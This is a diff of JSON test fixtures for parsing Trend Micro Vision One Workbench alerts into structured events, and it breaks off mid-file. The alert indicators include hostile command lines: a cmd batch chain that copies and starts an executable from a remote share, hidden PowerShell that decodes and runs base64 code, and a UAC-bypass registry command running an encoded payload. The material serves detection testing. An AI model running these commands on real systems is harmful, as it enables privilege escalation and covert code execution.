\"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Process Injection from Windows Temporary Location to System32", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3" + }, + "@timestamp": "2024-07-23T07:49:48Z", + "host": { + "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "ip": [ + "19.112.87.74" + ], + "name": "CHTX-XMEDICA-2K12.windows10.local" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "SesProbe-31944.exe ", + "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "hash": { + "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303" + }, + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + } + }, + "pid": 5552 + }, + "related": { + "hash": [ + "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + ], + "ip": [ + "19.112.87.74" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Process Injection from Windows Temporary Location to System32" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "incident_id": "IC-14558-20240722-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json new file mode 100644 index 000000000..6598afe24 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json @@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": 